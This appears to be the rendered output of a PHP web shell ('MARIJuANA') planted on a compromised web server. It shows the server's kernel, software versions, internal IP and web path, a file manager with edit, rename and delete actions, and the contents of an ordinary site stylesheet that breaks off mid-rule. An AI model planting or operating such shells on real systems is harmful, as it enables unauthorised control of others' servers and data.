MARIJuANA
— DIOS — NO — CREA — NADA — EN — VANO —
Linux instance-20230208-1745 6.8.0-1013-oracle #13~22.04.1-Ubuntu SMP Mon Sep 2 13:02:56 UTC 2024 x86_64
  SOFT : Apache/2.4.52 (Ubuntu) PHP : 8.1.2-1ubuntu2.19
/var/www/guajeru/html/assets_2/sass/components/Layout/
10.0.0.135

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACT ]
+FILE +DIR
_contents.scss 4.771 KB -rw-r--r-- 2023-03-06 15:31 R E G D
_footers.scss 6.878 KB -rw-r--r-- 2023-03-06 15:31 R E G D
_general.scss 0 KB -rw-r--r-- 2023-03-06 15:31 R E G D
_headers.scss 25.89 KB -rw-r--r-- 2023-03-06 15:31 R E G D
_homepages.scss 18.799 KB -rw-r--r-- 2023-03-06 15:31 R E G D
_loading.scss 2.264 KB -rw-r--r-- 2023-03-06 15:31 R E G D
_pages.scss 6.444 KB -rw-r--r-- 2023-03-06 15:31 R E G D
_sidebar.scss 0 KB -rw-r--r-- 2023-03-06 15:31 R E G D
REQUEST EXIT
/** 6.6.1 Home page 2 **/ @include brand-home-page("color-home2",$brand-home2); @include brand-home-page("color-home3",$brand-home3); @include brand-home-page("color-home4",$brand-home4); @include brand-home-page("color-home6",$brand-home6); @include brand-home-page("color-home7",$brand-home7); .float-left{ @include rtl-float-left; } .float-right{ @include rtl-float-right; } .align-right{ @include rtl-text-align-right; } .align-left{ @include rtl-text-align-left; } .rtl-transform0{ @include rtl-transform(0deg); } .rtl-transform180{ @include rtl-transform(180deg); } .wrap-hermes-collection.padding-5{ padding: 0 5px; } .btn.btn-default.button_search:hover, .btn.btn-default.button_search:focus{ color:#333; } .container{ &.container-ver2{ width: 1170px; padding:0 15px; } } body{ &.bg{ background: #040f21 url(../images/bg-wrappage.jpg)no-repeat; background-size:100% auto; .wrappage{ @media (min-width:1200px){ width: 1260px; } margin:auto; background:#fff; } } } .bottom-home1.bottom-home1-home4{ display: inline-block; width: 100%; .col-md-4{ &:first-child{ padding-left:0px; } &:last-child{ padding-right:0px; } } } .nav-hidden{ .tp-rightarrow.default,.tp-leftarrow.default{ opacity: 0; } } .ver2{ .tp-leftarrow,.tp-rightarrow{ display: none !important; } } .main-content.main-content-home2{ margin-top:-40px; position: relative; margin-bottom:-40px; .container{ background:#fff; } } .content-bottom-home2{ h3{ text-transform: uppercase; font-size: 22px; color: #gray-dark; border-bottom:1px solid #e5e5e5; line-height: 20px; padding: 25px 0px; position: relative; margin-bottom: 40px; &:after{ position: absolute; content: ""; background: $brand-home2; height: 3px; width: 60px; left: 0px; bottom: -1px; } } } /** 6.6.3 Home page 3 **/ ul.tabs.title.tabs-home3{ position: absolute; width: auto; top: 5px; right: 100px; li{ font-size: 15px; font-family: "TXGR"; text-transform: capitalize; color: #aaa; padding: 0 10px; &:hover,&.active{ color: $brand-home3; } } } .carousel-control{ opacity:100; height:30px; width:30px; top:50%; margin-top:-15px; @include transition(all 0.3s ease 0s); &:hover{ i{ color: $brand-primary; } } &.left{ left: 20px; &:hover{ left: 10px; } } &.right{ right: 20px; &:hover{ right: 10px; } } i{ font-size: 30px; } } // HomeVersion4 // Home page ver 5 nav.megamenu-v2{ position: absolute; top: 0px; left: 0px; background-color: #222; width: 400px; @include transform(translate3d(-400px, 0px, 0px)); @include transition(transform 0.5s ease 0s); z-index: 999; &.show-ef{ @include transform(translate3d(0px, 0px, 0px)); } .top-menu{ padding: 20px 0px; border-top: 1px solid #393939; border-bottom: 1px solid #393939; display: inline-block; width: 100%; .dropdown{ display: inline-block; float: left; width: 50%; text-align: center; &:nth-child(1){ border-right: 1px solid #393939; } .btn{ background-color:#222; color: #ddd; text-transform: capitalize; padding: 0px; } } } .fa-times{ height: 21px; width: 21px; cursor: pointer; float: right; margin-right: 40px; margin-top: 10px; background: url(../images/icon-menu-mobile-active.svg)no-repeat; &::before{ content:""; } } ul.main-menu{ padding-top:30px; li{ text-transform: uppercase; position: relative; padding: 15px 0px; border-bottom: 1px solid #393939; &.active{ a{ color: #fff; } ul{ li{ a{ color: $gray; &:hover{ color: #fff; } } } } } ul{ display: none; padding: 20px 0 10px; margin-top: 10px; border-top: 1px solid #393939; li{ padding-left: 20px; list-style: inside disc none; color: $gray; padding: 5px 0px 5px 20px; border-bottom: none; a{ text-transform: capitalize; font-family: "Lora"; font-style: italic; margin-left: 0px; } i{ display: none; } } } a{ color: $gray; margin-left: 20px; &:hover{ color: #fff; } } i{ position: absolute; cursor: pointer; top: 10px; right: 10px; color: $gray; font-size: 18px; &:before{ content:"\f107"; } &.active{ &:before{ content: "\f106"; } } } &:last-child{ border: none; } } } } .tp-banner-container{ width: 100% !important; left: 0px !important; span{ display: inline-block; width: 100%; font-family: "Montserrat"; font-weight: 700; font-size: 16px; color: #666; line-height: 50px; @